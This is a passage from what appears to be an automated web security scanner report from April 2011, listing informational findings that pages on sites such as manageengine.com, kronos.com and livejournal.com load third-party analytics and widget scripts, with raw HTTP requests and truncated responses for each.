<meta http-equiv="Content-
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.71. http://www.integritydefender.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /contact.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/about.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.72. http://www.integritydefender.com/faq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /faq.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.73. http://www.integritydefender.com/personal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /personal.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personal.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.74. http://www.integritydefender.com/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /privacy.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.75. http://www.internetreputationmanagement.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetreputationmanagement.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.internetreputationmanagement.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:06 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=jdc0ug637ehtjrcdllsnmave75; expires=Wed, 18-May-2011 19:26:26 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</div>
<script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/48536788/?cmd=mTagRepstate&amp;site=48536788&amp;buttonID=12&amp;divID=lpButDivID-1292366806&amp;bt=1&amp;c=1"></script>
...[SNIP]...
24.76. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/images/bg-tab.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sites/all/themes/newtheme/images/bg-tab.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:49 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=nid2651v1v78l5k1j020guaaj4; expires=Wed, 18-May-2011 19:27:09 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</div>
<script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/48536788/?cmd=mTagRepstate&amp;site=48536788&amp;buttonID=12&amp;divID=lpButDivID-1292366806&amp;bt=1&amp;c=1"></script>
...[SNIP]...
24.77. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/js/Coolvetica_400.font.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sites/all/themes/newtheme/js/Coolvetica_400.font.js HTTP/1.1
Host: www.internetreputationmanagement.com
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS66f1c041454c024a385686a578c40a41=ogb51ub0vsr90vi4u3afvog295

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:07 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</div>
<script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/48536788/?cmd=mTagRepstate&amp;site=48536788&amp;buttonID=12&amp;divID=lpButDivID-1292366806&amp;bt=1&amp;c=1"></script>
...[SNIP]...
24.78. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...
24.79. http://www.iveco-ptc.spb.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:51:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10399

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...
24.80. http://www.kayako.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:40:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_visit=988418453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__last_activity=1303778453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Help Desk Softwa
...[SNIP]...
</script>

<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2652.js"></script>
...[SNIP]...
24.81. http://www.kronos.com/about/about-kronos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /about/about-kronos.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/about-kronos.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; mbox=session#1303738433760-48782#1303741368|check#true#1303739568

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 50460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=kronosinc"></script>
...[SNIP]...
24.82. http://www.livejournal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
</div>
<script type="text/javascript" src="http://goods.adnectar.com/analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16"></script>
...[SNIP]...
<div id='hello-world' style='text-align: left; font-size:0; line-height:0; height:0; overflow:hidden;'><script src="http://cdn.media6degrees.com/static/lj6387.js" type="text/javascript"></script>
...[SNIP]...
24.83. http://www.manageengine.com/me_partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /me_partners.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /me_partners.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAG6seZC5-80EYpG3Eowtf_xRwM1sgXERs8XczokQgZjklQhF0XhQSa2xDB0fQgxu1i4QAlNSpXoJ36w"type="text/javascript"></script>
<script defer="defer" src="http://gmaps-utility-library.googlecode.com/svn/trunk/markerclusterer/1.0/src/markerclusterer.js"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.84. http://www.manageengine.com/products/applications_manager/application-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/applications_manager/application-performance-management.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/applications_manager/application-performance-management.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.9.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:38 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:22:06 GMT
ETag: "8fc7-49f3702cf4b80"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 36807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.85. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.2.10.1303732848
If-None-Match: "d3ec-49f24fc659f40"
If-Modified-Since: Wed, 23 Mar 2011 11:51:49 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:11:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.86. http://www.manageengine.com/products/security-manager/download.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/download.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/security-manager/download.html?features HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:28:00 GMT
ETag: "15369-4a1bba9688c00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 86889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script><script id="mstag_tops"type="text/javascript"src="//flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js"></script>
...[SNIP]...
</script>
